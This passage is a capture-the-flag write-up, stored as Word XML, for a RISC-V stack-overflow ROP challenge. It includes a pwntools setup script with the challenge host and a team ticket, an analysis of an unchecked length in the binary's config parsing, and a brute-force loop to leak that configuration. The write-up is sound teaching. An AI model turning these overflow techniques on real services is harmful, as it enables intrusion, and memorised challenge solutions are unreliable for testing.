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4.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId29.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId32.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId35.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rop-baby"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">dROP-Baby</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Category</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Pure Pwnage</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Summary</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Stack overflow which leads to a ROP on RISC-V/32 architecture</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="28" w:name="description"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This is a variation of the Smash-RiscV challenge, but the stack is not marked as executable, and there is a hidden configuration that leads to a stack overflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">NOTE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: you should have</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">gdb-multiarch</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">qemu-riscv32</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">installed</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="20" w:name="python-setup"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Python Setup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">#!/usr/bin/env python3</w:t>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os</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">exe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ELF(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"./drop-baby"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">context.arch </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"riscv"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">context.bits </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">32</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># context.binary = exe</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">gdbscript </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"""</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">file drop-baby</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">target remote localhost:1234</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"""</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">def</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> start():</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> args.REMOTE:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        io </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> remote(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"drop.quals2023-kah5Aiv9.satellitesabove.me"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">5300</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        io.sendline(</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"ticket{golf366979sierra4:GHAZFC9h62tmeRLKrH7JlpRnLQFEWH0TU6xmyKtehG8X8rjRbnOSYab8ZO3iwQTkTg}"</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args.GDB:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            os.system(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"tmux splitw -h gdb-multiarch -ex init-gef -x .gdbrun"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        io </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> process(</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"qemu-riscv32"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"-g"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"1234"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"drop-baby"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            env</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"FLAG"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{REDACTED}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"TIMEOUT"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"999999999"</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io</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">io </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> start()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">io.interactive()</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="20"/>
    <w:bookmarkStart w:id="27" w:name="how-the-binary-works"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">How the binary works</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In brief, the binary emulates a satellite that receives a message and sends a response. Firstly, the binary loads the timeout and flag from the environment variables. If the timeout is not present, 10 seconds is set as the default value. If the flag is not present, the program won’t start. The main portion of the code comes after, where we can see some configuration being loaded from</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">server.ini</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and a loop that synchronizes the connection and reads a message from it. The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">loadINI("server.ini")</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">function simply reads the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">server.ini</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">file, parses the format, and loads the actual configuration into memory.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">synchronize()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">function discards all the remaining bytes until it encounters the sequence</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">\xde\xad\xbe\xef</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4848225" cy="3076575"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="" title="" id="22" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="./images/01.png" id="23" name="Picture"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeArrowheads="1" noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4848225" cy="3076575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Here, we can see the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">read_message()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">function. In brief, it checks the next byte after</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">\xde\xad\xbe\xef</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and executes different functions depending on the byte that we send. Here is where the configuration is used. These values are actually used to determine the length of the message to be received, which is different depending on the type of message that we are sending (</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">b1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">b2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Every message has to be of the length specified in the corresponding configuration minus 4 (space left for the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">crc32</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), and have a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">crc32</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">of the message at the end; otherwise, it shall close the connection. Note that the message is read and written onto the stack, and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the maximum space allocated is 100</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Since the configuration is not checked a value greater than 100 may lead to an overflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5010150" cy="7953375"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="" title="" id="25" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="./images/02.png" id="26" name="Picture"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeArrowheads="1" noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5010150" cy="7953375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="27"/>
    <w:bookmarkEnd w:id="28"/>
    <w:bookmarkStart w:id="38" w:name="solution"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Solution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The interesting part is that we do not have the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">server.ini</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">file, but we can retrieve it by using the command</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">b1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Therefore, we must guess the random configuration for that specific command. To print it, as already mentioned, we have to send a message with the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">crc32</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">appended at the end, with the length specified in the configuration. But since we do not have that file, we can just send</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">b1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">messages with increasing length until the configuration is printed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="4371975" cy="4276725"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="" title="" id="30" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="./images/03.png" id="31" name="Picture"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeArrowheads="1" noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4371975" cy="4276725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Here is a simple script to get the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">server.ini</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">for i in range(0, 0x1000):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    with start() as io:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        # synchronize</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        io.send(b"\xde\xad\xbe\xef")</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        # print configuration</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        io.send(b"\xb1")</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        msg = b"?" * i</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        msg += p32(zlib.crc32(msg))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        io.send(msg)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
